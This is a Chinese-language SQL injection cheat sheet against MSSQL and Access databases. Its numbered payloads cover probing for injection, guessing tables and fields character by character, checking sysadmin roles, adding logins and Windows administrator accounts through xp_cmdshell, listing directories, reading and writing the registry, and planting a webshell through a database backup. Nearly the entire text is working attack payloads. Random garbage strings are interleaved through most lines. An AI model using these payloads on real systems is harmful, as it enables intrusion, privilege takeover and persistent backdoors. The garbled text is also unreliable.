1.判断是否有注入;and 1=1 ;and 1=2 DSQ2|{
2.初步判断是否是mssql ;and user>0 ncqAof(/
90#* el
3.注入参数是字符'and [查询条件] and ''=' <2N{oK.
JR8|!Of@B
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 'i',M+0>jC
/k8I6
5.判断数据库系统 <?s@-mpgN
]~2iducB,
;and (select count(*) from sysobjects)>0 mssql Bv<aB(c
[Do^EJ
;and (select count(*) from msysobjects)>0 access .' }jd#
]VL} eHZ
Z_[ P7P
\3OEC`
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Q3Pu<j}Y
URceq2_
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 yDfH`]i)U
nNq<x^@83
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 l`.z^+!8@
D&i\dgbK
9.(1)猜字段的ascii值(access) p[w! SR%=
LN~mKoW
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 d?&`ZVl
.W^B(y(tA
(2)猜字段的ascii值(mssql) 7HkFDI()1
}f;WYz 5
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 /{f"0]-RA
D(l,Z
10.测试权限结构(mssql) 6@TU9AZS`
+j{(NwsX
sC.b'1P
Q7rBc
wm5
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- qCg<g
2TUV9Z
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- & XmaGtt
O 2-n-
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 6#7hMQ0&;O
md*U
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,VS(4
1~ W@[D
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- bn)1G$0|
k:I,$"y4
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- OHi.5 (
+}O -WX?
;and 1=(select IS_MEMBER('db_owner'));-- #B<EMGH
}[Z'Sg]s
{;DAKWm@T
gu3iaM$W
11.添加mssql和系统的帐户 Mh*r)B~%[
||JUP}eP
;exec master.dbo.sp_addlogin username;-- 4XNheP;b
;exec master.dbo.sp_password null,username,password;-- x(._?5
w+/`l*
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- KJRAW]?{
& ?x R
;exec master.dbo.xp_cmdshell 'net user username password 0S^&A?$=
qmFG
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- tBbOxM m0
PQDLbSe)\
;exec master.dbo.xp_cmdshell 'net user username password /add';-- +=jS!
ep=r7Mft
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- :~ pGHl
n74\{`8]o
rw,Ylr:3
])wdd>'
12.(1)遍历目录 @>HTbs6W
i+h*<){X
;create table dirs(paths varchar(100), id int) iI{L>
<a]i"s
;insert dirs exec master.dbo.xp_dirtree 'c:\' LP6p
i}VF$XN
;and (select top 1 paths from dirs)>0 SK
lvZ
_8a;5hS
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) qS#G7~ur>y
c`soVqT$?
'|DW#l\n
-T,?'J0 2
(2)遍历目录 lFGuQLuqA{
&1$d`>fn
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- r|EN 5
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 R3~,&ab
B:Ts_9*
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 EY )2,
ZU73UL
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 g%&E~V/g$
>E>yA d
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 HEBeJ2w
q7X#LY k
@khFk.LBD
x"{aO6M
13.mssql中的存储过程 SI=$s>1
rZKfb}ANQ
xp_regenumvalues 注册表根键, 子键 wAKHD*M)
f`n4'dG
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Z^_qXerjP
!?nbB2,
xp_regread 根键,子键,键值名 hyH[`wiq
ysz =Xw
;exec xp_regread _K o#36.S
V4+|D2
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 #RBrii-,
5tYo! f
xp_regwrite 根键,子键, 值名, 值类型, 值 _#u\ar)
f' ?/P~[
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 A`n>9|R
n9'3~qVZ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 a_RY Yj
riDb!oC
xp_regdeletevalue 根键,子键,值名 17 Ugz?
wXKtQ#o}
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 hq
3n&/
Nap[=[rv
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 =6u@JpOl
|NuMDVd+s
~[HzGm%
CRK%^3g
14.mssql的backup创建webshell ;Z]Wj9iY
ij
?7MP
use model r{;NGQYs
yp#!$+a}
create table cmd(str image); 7%y$^B7{
$ln8Cpbca
insert into cmd(str) values (''); ib=)N)l
lL}NiN-)t
backup database model to disk='c:\l.asp'; 'X;cgAq8(
(`1io
=SJ#6uFS
QQrldc(I
15.mssql内置函数 8K,X3a9
h p]J>i.
;and (select @@version)>0 获得Windows的版本号 >Zb!?ntN`t
i g(O$y
;and user_name()='dbo' 判断当前系统的连接用户是不是sa k =5k)}i
5(+9a
;and (select user_name())>0 爆当前系统的连接用户 '^UHY[mX8
0k
(-
;and (select db_name())>0 得到当前连接的数据库 Fi/iA%,
o-\h;aQJ
^%r6+ey
lq-KM8j
16.简洁的webshell &t=:xVn-M
~*HQPp?v
use model w"j>^#8
|V a:*3u
create table cmd(str image); ~CNB3r5R
@G4Z
insert into cmd(str) values (''); |Xt.[1
Tn&